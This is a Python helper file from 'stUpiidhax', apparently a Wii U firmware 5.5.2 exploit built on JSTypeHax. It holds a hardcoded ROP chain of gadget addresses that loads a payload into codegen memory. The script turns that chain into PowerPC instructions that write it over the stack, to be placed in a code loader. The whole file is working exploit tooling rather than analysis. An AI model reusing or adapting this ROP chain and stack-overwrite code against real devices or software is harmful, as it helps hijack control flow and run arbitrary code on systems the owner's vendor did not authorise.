stUpiidhax, the Wii U 5.5.2 exploit (based on JSTypeHax) http://stupiid.ovh/

ropChainToAsm.py 2.5KB

12345678910111213141516171819202122232425262728293031323334353637383940
  1. # Assemble rop chain into semi-optimized ppc to write over the stack
  2. # ROP chain based on yellows8's wiiuhaxx_common for loading into codegen
  3. # FFFF2222 is a stand in for the payload load address (stored in r7)
  4. # FFFF3333 is a stand in for the payload size (stored in r11)
  5. # place at "found:" in codeloader.s
  6. #This ROP chain was created using:
  7. # ropgen_copycodebin_to_codegen(0x01800000, 0xFFFF2222, 0xFFFF3333)
  8. # ropchain_appendu32(0x01800000)
  9. # in ropchainBuilder.html
  10. ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
  11. ropChainAddresses = []
  12. for i in ropChain:
  13. if not i in ropChainAddresses:
  14. ropChainAddresses.append(i)
  15. # Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
  16. # then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size
  17. writeRegister = ''
  18. for address in ropChainAddresses:
  19. if address == 'FFFF2222':
  20. writeRegister = 'r7'
  21. elif address == 'FFFF3333':
  22. writeRegister = 'r11'
  23. elif address[:4] == '0000':
  24. print('li r10, 0x'+address[4:])
  25. writeRegister = 'r10'
  26. else:
  27. print('lis r10, 0x'+address[:4])
  28. if address[4:] != "0000":
  29. print('ori r10, r10, 0x'+address[4:])
  30. last = ropChain.index(address)
  31. while last != -1:
  32. print('stw %s, 0x%X(r1)' % (writeRegister, last * 4))
  33. try:
  34. last = ropChain.index(address, last+1)
  35. except ValueError:
  36. last = -1